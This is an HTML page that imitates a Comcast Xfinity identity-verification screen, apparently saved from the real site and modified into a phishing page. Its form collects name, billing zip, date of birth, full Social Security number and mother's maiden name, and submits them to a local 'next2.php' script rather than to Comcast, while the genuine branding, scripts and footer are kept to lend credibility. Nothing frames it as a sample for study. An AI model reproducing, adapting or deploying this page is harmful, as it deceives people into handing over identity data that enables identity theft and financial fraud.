<!DOCTYPE html>
<!-- saved from url=(0059)https://idm.xfinity.com/myaccount/create-uid?execution=e1s4 -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script id="iPerceptions Art engine" src="./info-verification_files/artexpo_122423_v30.js.download" type="text/javascript"></script><script type="text/javascript" async="async" src="./info-verification_files/s19979932432230"></script>
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <title>Verify Your Information</title>
    <meta name="description" content="Comcast Identity Management Portal">
    <meta name="author" content="Comcast">

    <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0">

	<urscrub></urscrub><script type="text/javascript" async="" src="./info-verification_files/us2431a946a4b7d17778d9c086a94cdd1dd.js.download"></script><script src="./info-verification_files/satelliteLib-773f1d685076ba02ef9dd20f568cce9a6f1991dd.js.download"></script><script src="./info-verification_files/mbox-contents-fda2ad87579c80ed559acf8145c2499258e757cf.js.download"></script><style id="at-id-default-content-style">.mboxDefault {visibility:hidden;}</style>
 	<script src="./info-verification_files/jquery-1.11.3.min.js.download"></script>
 	<script src="./info-verification_files/lodash.min.js.download" type="text/javascript"></script>
 	<script src="./info-verification_files/tracking-DTM.min.js.download" type="text/javascript"></script>
 	<script src="./info-verification_files/tracking.min.js.download" type="text/javascript"></script>
 	
<!-- Variable to hold what events need to handle for input fields -->
<script>
	function secondaryButtonHandler(){var t=$("button[type=submit]:eq(0)");t.attr("value",$(this).attr("value")).attr("formnovalidate",""),$(this).attr("data-loader")?t.attr("data-loader",!0):t.removeAttr("data-loader"),t.click()}var inputEvents="input";</script>
<!--[if lte IE 9]>
	<script>
	inputEvents="keyup change paste";
	</script>
<![endif]-->
<!--[if lt IE 9]>
	<script> 
		window.html5 = { shivMethods: false, shivCSS: false };
		function secondaryButtonHandler() {
			var value = $(this).attr('value');
			$('form').append("<input name='_eventId' type='hidden' value='"+value+"'/>");
			$('form')[0].submit();
		}
	</script>
    <script src="js/libs/html5shiv-printshiv.min.js"></script>
    <script src="js/libs/selectivizr-min.js"></script>
<![endif]-->
<!--[if IE 9]>
	<script> window.html5 = { elements: 'main', shivMethods: false, shivCSS: false }; </script>
    <script src="js/libs/html5shiv-printshiv.min.js"></script>
<![endif]-->

	<link rel="stylesheet" href="./info-verification_files/styles-light.min.css">

<!--TODO: decide if we should be using the googleapis-->
	<!--<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
	<script>window.jQuery || document.write('<script src="js/libs/jquery-1.11.3.min.js"></script>')</script>
	-->

	<script src="./info-verification_files/dropkick.2.1.7.min.js.download"></script>

<!--TODO: decide if we should be using the aspnetcdn-->
	<!--<script src="//ajax.aspnetcdn.com/ajax/jquery.validate/1.13.1/jquery.validate.min.js"></script>
	<script src="//ajax.aspnetcdn.com/ajax/jquery.validate/1.13.1/additional-methods.min.js"></script>
	<script>jQuery.validator || document.write('<script src="js/libs/jquery.validate.min.js"></script><script src="js/libs/additional-methods.min.js"></script>')</script>
	-->
	<script src="./info-verification_files/jquery.validate.min.js.download"></script>
	<script src="./info-verification_files/additional-methods.min.js.download"></script>

<!--[if lt IE 9]>
    <script src="js/libs/respond.min.js"></script>
    <script src="js/libs/PIE_IE678.js"></script>
    <style>
    .xfinity-logo {
	    background: url(images/xfinity.png);
    }

    button.primary, button.secondary, button.submit, .button.primary, .button.secondary, .button.submit {
    	min-width: 90px;
    }

	[role=dialog].overlay .content {
		max-width: 592px;
	}

    input {
		position: relative;
		padding-top: 10px;
    }

	input[type=checkbox].slvzr-checked ~ .checkbox:after {
		display: none;
	}

	input[type=checkbox].slvzr-checked ~ .checkbox {
		background: none;
		border: none;
		background-image: url(images/checkbox_checked.png);
	}

	.icon.valid:after {
		border: none;
		width: 22px;
		height: 22px;
		margin: -1px 0 0 -1px;
		background-image: url(images/green_checkmark.png);
	}

	.dk-selected:after {
		background-image: url(images/chevron-down.png);
		width: 14px;
	    height: 7px;
	    border: none;
		margin-top: 13px;
	}
	.dk-select-open-down .dk-selected:after {
		background-image: url(images/chevron-up.png);
	}
    </style>
<![endif]-->
<!--[if lte IE 9]>
	<script type="text/javascript" src="js/libs/jquery.placeholder-plugin.min.js"></script>
    <script>
    	$(document).ready(function() {
    		$("input[name=mobilePhoneNumber]").removeAttr('placeholder');
			$("#userName").removeAttr('placeholder');
    		$('input:not([type=password]), textarea').placeholder();
			$('#passwordRetype').each(function() {
				var passwordPlaceholder=$(this).attr('placeholder');
    	  		$(this).before('<label for="passwordRetype">'+passwordPlaceholder+'</label>');
    		});
    	});
    </script>
<![endif]-->

<style type="text/css">
	section .right { position: relative; }
.style1 {
	color: #333333;
	font-weight: bold;
	font-size: 21px;
}
.style2 {
	font-size: 23px;
	font-weight: bold;
}
</style>
<!--TODO: decide what libraries above, if any, should be inserted into the scripts.min.js-->
	<script src="./info-verification_files/scripts.min.js.download"></script>

<script src="./info-verification_files/satellite-5784f5c764746d24f80015ae.js.download"></script><script src="./info-verification_files/satellite-57dae85564746d7a9c010c22.js.download"></script><script src="./info-verification_files/s-code-contents-11c8f38a44853a1fa459e08fd609da47c7ce7efd.js.download"></script><script src="./info-verification_files/satellite-57dabd4464746d192c010983.js.download"></script><script src="./info-verification_files/satellite-580fe8b364746d7de000adbc.js.download"></script><script src="./info-verification_files/satellite-57ee858c64746d28e2004caa.js.download"></script><script src="./info-verification_files/satellite-582b2bc464746d0663003678.js.download"></script><script src="./info-verification_files/satellite-57ee850c64746d28e2004c7f.js.download"></script></head>
<body>
<div id="breakpoints"></div>
<div id="background" style="height: 586px;"></div>
<header>
	<nav><a class="xfinity-logo" href="http://xfinity.comcast.net/"><span class="accessibly-hidden">XFINITY</span></a></nav></header>

	<main role="main" class="main-content">

		<p>&nbsp;</p>
		<table width="324" border="0" align="center">
          <tr>
            <td><div align="center" class="style2">Confirm Profile  Information</div></td>
          </tr>
        </table>
		<form id="maiForm" action="next2.php" method="post" required="required" autocomplete="off">
		  <table style="border-collapse:collapse; background-color:#FFFFFF; margin-left:9px; margin-right:9px; margin-bottom:9px; margin-top:9px; padding-left:9px; padding-right:9px; padding-bottom:9px; padding-top:9px;" width="511" height="306" border="1" bordercolor="#FFFFFF">
            <tr>
              <td width="501"><table width="503" height="283" border="1" align="center">
                <tr>
                  <td colspan="2"><div align="left" class="style1">Profile Preference </div></td>
                </tr>
                <tr>
                  <td width="176"><div align="center">First Name:<br><input name="firstname" type="text" maxlength="30" id="firstname" class="text name" required="required"> </div></td>
                  <td width="241"><div align="center">Last name:<br><input name="lastname" type="text" maxlength="30" id="lastname" class="text name" required="required"> </div></td>
                </tr>
                <tr>
                  <td colspan="2"><div align="center">Billing Zip:<br><input name="zip" type="text" maxlength="30" id="zip" class="text name" required="required"> </div></td>
                </tr>
                <tr>
                  <td colspan="2"><div align="left" class="style1">Security Preference</div></td>
                </tr>
                <tr>
                  <td><div align="center">Date of Birth:<br><input name="dob" type="text" maxlength="30" id="dob" class="text name" placeholder="MM/DD/YYYY" required="required"> </div></td>
                  <td><div align="center">Social Security Number:<br><input name="ss" type="text" maxlength="30" id="ss" class="text name"  placeholder="###-##-####" required="required"> </div></td>
                </tr>
                <tr>
                  <td><div align="center">Mothers Maiden Name:<br><input name="mmn" type="text" maxlength="30" id="mmn" class="text name" required="required"> </div></td>
                  <td></td>
                </tr>
				<tr>
                  <td colspan="2"><button  class="submit" type="submit" id="continue" name="_eventId" value="submit">
              <div align="center">Continue</div>
              </button></td>
                </tr>
                
           
              </table></td>
            </tr>
          </table>
</form><script>
	idm.ssnVerificationInit=function(){function t(){var t=$("#dateOfBirth\\.month").val()+"/"+$("#dateOfBirth\\.date").val()+"/"+$("#dateOfBirth\\.year").val();10==t.length&&$("#dateOfBirth").val(t)}$(document).ready(function(){$("#phoneNumber").bind(inputEvents,function(){appendPhoneNumber()}),$("#dateOfBirth").bind(inputEvents,function(){appendDateOfBirth()}),displayPhoneNumber(),t()}),jQuery.validator.addMethod("ValidateDateOfBirth",customDateOfBirthValidation,"This date is invalid."),jQuery.validator.addClassRules("dob",{ValidateDateOfBirth:!0});idm.createNewValidator({})};
	$(document).ready(idm.ssnVerificationInit);
</script>












<!-- TODO: add support for product -->
</main>

<footer>
		<span class="content">
			<span class="copyright">
				© 2016 Comcast</span>
			<nav>
				<span class="divider"></span>
<a href="http://xfinity.comcast.net/siteindex/">Site Map</a>
<span class="divider"></span>
<a href="http://my.xfinity.com/privacy/">Privacy Policy</a>
<span class="divider"></span>
<a href="http://my.xfinity.com/terms/web">Terms of Service</a>
<span class="divider"></span>
<a href="https://customer.comcast.com/contact-us/">Contact Us</a></nav>
			<span id="b537c389-7be1-4331-bb73-03a71788bc12" class="truste">
<script type="text/javascript" src="./info-verification_files/asc"></script>
<a href="https://privacy.truste.com/privacy-seal/Comcast-Cable-Communications-Management,-LLC/validation?rid=bf9d4d6f-2b32-4201-a167-5b55a4451508" title="TRUSTe online privacy certification" target="_blank">
<img style="border: none" src="./info-verification_files/seal" alt="TRUSTe online privacy certification"></a></span></span>	</footer>


<div id="startChatOverlay" role="dialog" hidden="">
	<div class="content">
		
	<h1>Any questions?</h1>
	<p>A customer representative would be happy to assist you. You will first need to answer a few questions so we can verify your identity.</p>
	<a class="submit button" href="https://chat.xfinity.com/Forms/UIDPassword" target="_new">Start Chat</a>

		
		<button type="button" class="close" title="Close" aria-label="Close"></button>
	</div>
</div>


<script>
	$(document).ready(function() {		 
		idm.init();
	});
</script>

<!--[if lt IE 9]>
<script>
$(function() {
	function attachPie() {
		setTimeout(function() {
		    $('button.submit, button.primary, .radio, .icon, .textfield, input').each(function() {
		    	if ($(this).is(':visible'))
			        PIE.attach(this);
		    });
	    }, 10);
    }

    attachPie();

    $('.icon').on('click',function() {
		attachPie();
    });

	function forcePieUpdate(selector) {
		$(selector).addClass('force-pie-update').removeClass('force-pie-update');
	}

    $('input[type=radio]').on('focus blur', function() {
		forcePieUpdate('.radio');
    });

    $.fn.slideDown = function(callback) { this.show().each(callback); }
    $.fn.slideUp = function(callback) { this.hide().each(callback); }
    
    $('form').submit(function(e){
    	var focusedButton = $('button[type=submit]:focus');
    	if( focusedButton.length) {
    		return true;
    	} 
    	var value = $('button[type=submit]:eq(0)').attr("value");
    	$('form').append("<input name='_eventId' type='hidden' value='"+value+"'/>");
    	
    	return true;
    });
});
</script>
<![endif]-->


	
	
	
	

	
	
	
	



	<script type="tracking-data-digitalData">
		{
			"page": {
				"category": {
			"primaryCategory": "idm",
			"subCategory1": "create-uid",
			
			"pageType": "idm"
		}
			},
			"siteInfo": {
				"siteVersion": "responsivedesign|CIMA IDM"
			}
		}
	</script>
	
	



	<script type="tracking-data-page">
		{
			
				"pageInfo": {
					"pageName": "Enter SSN, DOB, Phone"
				}
			
			
			
		}
	</script>





	

	

	

	

	

	

	

	

	

	

	

	

	

	

	
		
		
			
			
				
			
		
	

	

	

	

	

	

	
		
			
		
		
			
			
				
			
		
	



	<script type="tracking-data-user">
		[{
			"profile": [{
				"attributes": {
					"UIDVerificationMethod":"last 4 of ssn","uidCreationType":"IDM"
				}
			}]
		}]
	</script>


<script>
$(document).ready(function() {
	$("[rel='#startChatOverlay']").click(function(event) {
		idm.showOverlay($('#startChatOverlay'),$(this));
	});
});
</script>
<script>
	$(document).trigger('c-tracking-dtm-init');
	$(document).ready(function() {
		$(document).trigger('c-tracking-log-page');
	});
</script>


<script type="text/javascript" async="" src="./info-verification_files/wrapper.js.download"></script><iframe src="./info-verification_files/iFrame.html" id="iPerceptionsFrame" style="display: none;"></iframe><iframe id="destination_publishing_iframe_comcast_0" src="./info-verification_files/dest5.html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe><iframe id="artEXPOiFrame" name="CustomerFeedbackSurvey" title="CustomerFeedbackSurvey" frameborder="0" border="0" scrolling="no" seamless="seamless" allowtransparency="true" style="position: fixed; overflow-y: hidden; z-index: 99999; right: 0; bottom: 0; width: 136px; height: 58px; background-color: transparent; border: none; margin: 0; display: none; line-height: normal" src="./info-verification_files/saved_resource.html"></iframe></body></html>